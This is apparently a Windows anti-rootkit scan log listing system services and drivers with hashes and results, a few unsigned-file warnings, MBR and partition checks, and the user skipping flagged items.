21:10:37.0341 4344 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
21:10:37.0357 4344 RasSstp - ok
21:10:37.0403 4344 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
21:10:37.0435 4344 rdbss - ok
21:10:37.0466 4344 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
21:10:37.0528 4344 RDPCDD - ok
21:10:37.0559 4344 [ FBC0BACD9C3D7F6956853F64A66E252D ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
21:10:37.0591 4344 rdpdr - ok
21:10:37.0606 4344 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
21:10:37.0637 4344 RDPENCDD - ok
21:10:37.0669 4344 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
21:10:37.0731 4344 RDPWD - ok
21:10:37.0778 4344 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
21:10:37.0825 4344 RemoteAccess - ok
21:10:37.0871 4344 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
21:10:37.0903 4344 RemoteRegistry - ok
21:10:37.0934 4344 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
21:10:37.0981 4344 RpcLocator - ok
21:10:38.0012 4344 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
21:10:38.0059 4344 RpcSs - ok
21:10:38.0090 4344 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
21:10:38.0137 4344 rspndr - ok
21:10:38.0168 4344 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
21:10:38.0183 4344 SamSs - ok
21:10:38.0199 4344 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
21:10:38.0215 4344 sbp2port - ok
21:10:38.0261 4344 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
21:10:38.0293 4344 SCardSvr - ok
21:10:38.0339 4344 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
21:10:38.0417 4344 Schedule - ok
21:10:38.0480 4344 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
21:10:38.0527 4344 SCPolicySvc - ok
21:10:38.0573 4344 [ 126EA89BCC413EE45E3004FB0764888F ] sdbus C:\Windows\system32\DRIVERS\sdbus.sys
21:10:38.0636 4344 sdbus - ok
21:10:38.0651 4344 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
21:10:38.0714 4344 SDRSVC - ok
21:10:38.0807 4344 [ CC781378E7EDA615D2CDCA3B17829FA4 ] SeaPort C:\Program Files\Microsoft\BingBar\SeaPort.EXE
21:10:38.0823 4344 SeaPort - ok
21:10:38.0839 4344 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
21:10:38.0901 4344 secdrv - ok
21:10:38.0917 4344 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
21:10:38.0948 4344 seclogon - ok
21:10:38.0979 4344 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
21:10:39.0026 4344 SENS - ok
21:10:39.0057 4344 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
21:10:39.0135 4344 Serenum - ok
21:10:39.0151 4344 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
21:10:39.0229 4344 Serial - ok
21:10:39.0229 4344 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
21:10:39.0275 4344 sermouse - ok
21:10:39.0307 4344 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
21:10:39.0338 4344 SessionEnv - ok
21:10:39.0369 4344 [ 3EFA810BDCA87F6ECC24F9832243FE86 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
21:10:39.0385 4344 sffdisk - ok
21:10:39.0416 4344 [ E95D451F7EA3E583AEC75F3B3EE42DC5 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
21:10:39.0463 4344 sffp_mmc - ok
21:10:39.0478 4344 [ 3D0EA348784B7AC9EA9BD9F317980979 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
21:10:39.0525 4344 sffp_sd - ok
21:10:39.0541 4344 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
21:10:39.0603 4344 sfloppy - ok
21:10:39.0634 4344 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
21:10:39.0697 4344 SharedAccess - ok
21:10:39.0728 4344 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
21:10:39.0790 4344 ShellHWDetection - ok
21:10:39.0806 4344 [ 1D76624A09A054F682D746B924E2DBC3 ] sisagp C:\Windows\system32\drivers\sisagp.sys
21:10:39.0821 4344 sisagp - ok
21:10:39.0853 4344 [ 43CB7AA756C7DB280D01DA9B676CFDE2 ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
21:10:39.0868 4344 SiSRaid2 - ok
21:10:39.0899 4344 [ A99C6C8B0BAA970D8AA59DDC50B57F94 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
21:10:39.0915 4344 SiSRaid4 - ok
21:10:39.0977 4344 [ F07AF60B152221472FBDB2FECEC4896D ] SkypeUpdate C:\Program Files\Skype\Updater\Updater.exe
21:10:39.0993 4344 SkypeUpdate - ok
21:10:40.0133 4344 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
21:10:40.0352 4344 slsvc - ok
21:10:40.0399 4344 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
21:10:40.0430 4344 SLUINotify - ok
21:10:40.0477 4344 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
21:10:40.0508 4344 Smb - ok
21:10:40.0555 4344 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
21:10:40.0586 4344 SNMPTRAP - ok
21:10:40.0617 4344 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
21:10:40.0633 4344 spldr - ok
21:10:40.0679 4344 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
21:10:40.0726 4344 Spooler - ok
21:10:40.0804 4344 [ CDDDEC541BC3C96F91ECB48759673505 ] sptd C:\Windows\System32\Drivers\sptd.sys
21:10:40.0851 4344 sptd - ok
21:10:40.0898 4344 [ D2F4F32B59440011174B4F8137AF4E0C ] SQLWriter C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
21:10:40.0913 4344 SQLWriter - ok
21:10:40.0960 4344 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
21:10:41.0007 4344 srv - ok
21:10:41.0054 4344 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
21:10:41.0085 4344 srv2 - ok
21:10:41.0132 4344 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
21:10:41.0163 4344 srvnet - ok
21:10:41.0194 4344 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
21:10:41.0257 4344 SSDPSRV - ok
21:10:41.0288 4344 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
21:10:41.0303 4344 ssmdrv - ok
21:10:41.0350 4344 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
21:10:41.0381 4344 SstpSvc - ok
21:10:41.0428 4344 [ 359FEE084F1173FFFFD7F9CCBD43D47F ] ssudmdm C:\Windows\system32\DRIVERS\ssudmdm.sys
21:10:41.0459 4344 ssudmdm - ok
21:10:41.0475 4344 Steam Client Service - ok
21:10:41.0522 4344 [ EF70B3D22B4BFFDA6EA851ECB063EFAA ] StillCam C:\Windows\system32\DRIVERS\serscan.sys
21:10:41.0553 4344 StillCam - ok
21:10:41.0615 4344 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
21:10:41.0678 4344 stisvc - ok
21:10:41.0709 4344 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
21:10:41.0725 4344 swenum - ok
21:10:41.0771 4344 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
21:10:41.0803 4344 swprv - ok
21:10:41.0818 4344 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
21:10:41.0834 4344 Symc8xx - ok
21:10:41.0865 4344 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
21:10:41.0881 4344 Sym_hi - ok
21:10:41.0896 4344 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
21:10:41.0912 4344 Sym_u3 - ok
21:10:41.0974 4344 [ C5F25D490D0915732508FD421BF76D93 ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
21:10:41.0990 4344 SynTP - ok
21:10:42.0052 4344 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
21:10:42.0193 4344 SysMain - ok
21:10:42.0239 4344 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
21:10:42.0271 4344 TabletInputService - ok
21:10:42.0317 4344 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
21:10:42.0380 4344 TapiSrv - ok
21:10:42.0411 4344 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
21:10:42.0458 4344 TBS - ok
21:10:42.0520 4344 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
21:10:42.0598 4344 Tcpip - ok
21:10:42.0629 4344 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
21:10:42.0692 4344 Tcpip6 - ok
21:10:42.0723 4344 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
21:10:42.0754 4344 tcpipreg - ok
21:10:42.0801 4344 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
21:10:42.0832 4344 TDPIPE - ok
21:10:42.0879 4344 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
21:10:42.0910 4344 TDTCP - ok
21:10:42.0973 4344 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
21:10:42.0988 4344 tdx - ok
21:10:43.0004 4344 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
21:10:43.0035 4344 TermDD - ok
21:10:43.0066 4344 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
21:10:43.0144 4344 TermService - ok
21:10:43.0175 4344 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
21:10:43.0207 4344 Themes - ok
21:10:43.0222 4344 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
21:10:43.0253 4344 THREADORDER - ok
21:10:43.0300 4344 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
21:10:43.0347 4344 TrkWks - ok
21:10:43.0425 4344 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
21:10:43.0456 4344 TrustedInstaller - ok
21:10:43.0487 4344 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
21:10:43.0519 4344 tssecsrv - ok
21:10:43.0565 4344 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
21:10:43.0581 4344 tunmp - ok
21:10:43.0612 4344 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
21:10:43.0628 4344 tunnel - ok
21:10:43.0675 4344 TwonkyProxy - ok
21:10:43.0706 4344 TwonkyServer - ok
21:10:43.0721 4344 TwonkyWebDav - ok
21:10:43.0737 4344 [ 7D33C4DB2CE363C8518D2DFCF533941F ] uagp35 C:\Windows\system32\drivers\uagp35.sys
21:10:43.0753 4344 uagp35 - ok
21:10:43.0815 4344 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
21:10:43.0846 4344 udfs - ok
21:10:43.0893 4344 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
21:10:43.0940 4344 UI0Detect - ok
21:10:43.0955 4344 [ B0ACFDC9E4AF279E9116C03E014B2B27 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
21:10:43.0987 4344 uliagpkx - ok
21:10:44.0002 4344 [ 9224BB254F591DE4CA8D572A5F0D635C ] uliahci C:\Windows\system32\drivers\uliahci.sys
21:10:44.0018 4344 uliahci - ok
21:10:44.0049 4344 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
21:10:44.0065 4344 UlSata - ok
21:10:44.0080 4344 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
21:10:44.0096 4344 ulsata2 - ok
21:10:44.0111 4344 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
21:10:44.0158 4344 umbus - ok
21:10:44.0174 4344 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
21:10:44.0221 4344 upnphost - ok
21:10:44.0283 4344 [ 32DB9517628FF0D070682AAB61E688F0 ] usbaudio C:\Windows\system32\drivers\usbaudio.sys
21:10:44.0330 4344 usbaudio - ok
21:10:44.0377 4344 [ 9419FAAC6552A51542DBBA02971C841C ] usbbus C:\Windows\system32\DRIVERS\lgusbbus.sys
21:10:44.0408 4344 usbbus - ok
21:10:44.0439 4344 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
21:10:44.0470 4344 usbccgp - ok
21:10:44.0501 4344 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
21:10:44.0579 4344 usbcir - ok
21:10:44.0626 4344 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
21:10:44.0673 4344 usbehci - ok
21:10:44.0689 4344 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
21:10:44.0735 4344 usbhub - ok
21:10:44.0751 4344 [ CE697FEE0D479290D89BEC80DFE793B7 ] usbohci C:\Windows\system32\DRIVERS\usbohci.sys
21:10:44.0782 4344 usbohci - ok
21:10:44.0829 4344 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
21:10:44.0876 4344 usbprint - ok
21:10:44.0938 4344 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
21:10:44.0969 4344 usbscan - ok
21:10:45.0001 4344 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
21:10:45.0032 4344 USBSTOR - ok
21:10:45.0047 4344 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
21:10:45.0094 4344 usbuhci - ok
21:10:45.0110 4344 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
21:10:45.0141 4344 usbvideo - ok
21:10:45.0188 4344 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
21:10:45.0235 4344 UxSms - ok
21:10:45.0281 4344 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
21:10:45.0375 4344 vds - ok
21:10:45.0406 4344 [ 87B06E1F30B749A114F74622D013F8D4 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
21:10:45.0453 4344 vga - ok
21:10:45.0453 4344 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
21:10:45.0500 4344 VgaSave - ok
21:10:45.0531 4344 [ 5D7159DEF58A800D5781BA3A879627BC ] viaagp C:\Windows\system32\drivers\viaagp.sys
21:10:45.0547 4344 viaagp - ok
21:10:45.0562 4344 [ C4F3A691B5BAD343E6249BD8C2D45DEE ] ViaC7 C:\Windows\system32\drivers\viac7.sys
21:10:45.0593 4344 ViaC7 - ok
21:10:45.0609 4344 [ AADF5587A4063F52C2C3FED7887426FC ] viaide C:\Windows\system32\drivers\viaide.sys
21:10:45.0625 4344 viaide - ok
21:10:45.0656 4344 [ AE01E1ED5A81E0D268B91B4A6DE5A872 ] VNUSB C:\Windows\system32\DRIVERS\VNUSB.sys
21:10:45.0687 4344 VNUSB ( UnsignedFile.Multi.Generic ) - warning
21:10:45.0687 4344 VNUSB - detected UnsignedFile.Multi.Generic (1)
21:10:45.0703 4344 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
21:10:45.0718 4344 volmgr - ok
21:10:45.0765 4344 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
21:10:45.0796 4344 volmgrx - ok
21:10:45.0843 4344 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
21:10:45.0874 4344 volsnap - ok
21:10:45.0890 4344 [ 587253E09325E6BF226B299774B728A9 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
21:10:45.0905 4344 vsmraid - ok
21:10:45.0983 4344 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
21:10:46.0077 4344 VSS - ok
21:10:46.0124 4344 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
21:10:46.0155 4344 W32Time - ok
21:10:46.0171 4344 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
21:10:46.0233 4344 WacomPen - ok
21:10:46.0249 4344 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
21:10:46.0280 4344 Wanarp - ok
21:10:46.0280 4344 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
21:10:46.0311 4344 Wanarpv6 - ok
21:10:46.0358 4344 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
21:10:46.0420 4344 wcncsvc - ok
21:10:46.0451 4344 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
21:10:46.0483 4344 WcsPlugInService - ok
21:10:46.0514 4344 [ 78FE9542363F297B18C027B2D7E7C07F ] Wd C:\Windows\system32\drivers\wd.sys
21:10:46.0545 4344 Wd - ok
21:10:46.0592 4344 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
21:10:46.0639 4344 Wdf01000 - ok
21:10:46.0654 4344 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
21:10:46.0701 4344 WdiServiceHost - ok
21:10:46.0717 4344 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
21:10:46.0748 4344 WdiSystemHost - ok
21:10:46.0779 4344 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
21:10:46.0826 4344 WebClient - ok
21:10:46.0857 4344 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
21:10:46.0888 4344 Wecsvc - ok
21:10:46.0919 4344 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
21:10:46.0966 4344 wercplsupport - ok
21:10:47.0013 4344 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
21:10:47.0029 4344 WerSvc - ok
21:10:47.0075 4344 [ 5A77AC34A0FFB70CE8B35B524FEDE9BA ] winachsf C:\Windows\system32\DRIVERS\HSX_CNXT.sys
21:10:47.0122 4344 winachsf - ok
21:10:47.0185 4344 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
21:10:47.0200 4344 WinDefend - ok
21:10:47.0200 4344 WinHttpAutoProxySvc - ok
21:10:47.0294 4344 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
21:10:47.0325 4344 Winmgmt - ok
21:10:47.0403 4344 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
21:10:47.0512 4344 WinRM - ok
21:10:47.0575 4344 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
21:10:47.0653 4344 Wlansvc - ok
21:10:47.0777 4344 [ 5144AE67D60EC653F97DDF3FEED29E77 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
21:10:47.0887 4344 wlidsvc - ok
21:10:47.0933 4344 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
21:10:47.0980 4344 WmiAcpi - ok
21:10:48.0043 4344 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
21:10:48.0089 4344 wmiApSrv - ok
21:10:48.0183 4344 [ C8F8AAC50B5B0BF821AB7D7126056B30 ] WMIService C:\Acer\Empowering Technology\ePower\ePowerSvc.exe
21:10:48.0199 4344 WMIService ( UnsignedFile.Multi.Generic ) - warning
21:10:48.0199 4344 WMIService - detected UnsignedFile.Multi.Generic (1)
21:10:48.0261 4344 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
21:10:48.0386 4344 WMPNetworkSvc - ok
21:10:48.0433 4344 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
21:10:48.0495 4344 WPCSvc - ok
21:10:48.0542 4344 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
21:10:48.0589 4344 WPDBusEnum - ok
21:10:48.0635 4344 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
21:10:48.0651 4344 WpdUsb - ok
21:10:48.0776 4344 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
21:10:48.0823 4344 WPFFontCache_v0400 - ok
21:10:48.0838 4344 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
21:10:48.0869 4344 ws2ifsl - ok
21:10:48.0916 4344 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
21:10:48.0963 4344 wscsvc - ok
21:10:49.0025 4344 [ 4422AC5ED8D4C2F0DB63E71D4C069DD7 ] WSDPrintDevice C:\Windows\system32\DRIVERS\WSDPrint.sys
21:10:49.0057 4344 WSDPrintDevice - ok
21:10:49.0057 4344 WSearch - ok
21:10:49.0150 4344 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
21:10:49.0275 4344 wuauserv - ok
21:10:49.0322 4344 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
21:10:49.0353 4344 WudfPf - ok
21:10:49.0384 4344 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
21:10:49.0431 4344 WUDFRd - ok
21:10:49.0478 4344 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
21:10:49.0509 4344 wudfsvc - ok
21:10:49.0540 4344 [ 88AF537264F2B818DA15479CEEAF5D7C ] XAudio C:\Windows\system32\DRIVERS\xaudio.sys
21:10:49.0556 4344 XAudio - ok
21:10:49.0587 4344 [ 15A317674A08DF26BE65164D959E9203 ] XAudioService C:\Windows\system32\DRIVERS\xaudio.exe
21:10:49.0618 4344 XAudioService - ok
21:10:49.0665 4344 [ 09E5340BD9B2CB730BF4DC6BE7721291 ] xusb21 C:\Windows\system32\DRIVERS\xusb21.sys
21:10:49.0681 4344 xusb21 - ok
21:10:49.0759 4344 [ 04E268ADFC81964C49DC0C082D520F7E ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
21:10:49.0837 4344 yukonwlh - ok
21:10:49.0852 4344 ================ Scan global ===============================
21:10:49.0899 4344 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
21:10:49.0946 4344 [ A508314231C49AEE86987CEA3EAECAD1 ] C:\Windows\system32\winsrv.dll
21:10:49.0977 4344 [ A508314231C49AEE86987CEA3EAECAD1 ] C:\Windows\system32\winsrv.dll
21:10:50.0024 4344 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
21:10:50.0039 4344 [Global] - ok
21:10:50.0039 4344 ================ Scan MBR ==================================
21:10:50.0055 4344 [ 6FC6F9186C07BCA94E140F63BFE6E9B4 ] \Device\Harddisk0\DR0
21:10:53.0019 4344 \Device\Harddisk0\DR0 - ok
21:10:53.0019 4344 ================ Scan VBR ==================================
21:10:53.0035 4344 [ C41FA18DEDEC7D3E30F3881297CB79EB ] \Device\Harddisk0\DR0\Partition1
21:10:53.0035 4344 \Device\Harddisk0\DR0\Partition1 - ok
21:10:53.0050 4344 [ 5208586EACB52532FE084F9B665E647F ] \Device\Harddisk0\DR0\Partition2
21:10:53.0050 4344 \Device\Harddisk0\DR0\Partition2 - ok
21:10:53.0050 4344 ============================================================
21:10:53.0050 4344 Scan finished
21:10:53.0050 4344 ============================================================
21:10:53.0066 4112 Detected object count: 11
21:10:53.0066 4112 Actual detected object count: 11
21:11:09.0118 4112 AVerRemote ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0118 4112 AVerRemote ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0118 4112 AVerScheduleService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0118 4112 AVerScheduleService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0134 4112 eLockService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0134 4112 eLockService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0134 4112 eNet Service ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0134 4112 eNet Service ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0134 4112 eRecoveryService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0134 4112 eRecoveryService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0149 4112 eSettingsService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0149 4112 eSettingsService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0149 4112 LightScribeService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0149 4112 LightScribeService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0149 4112 ndsvc ( UnsignedFile.Multi.Generic ) - skipped by user
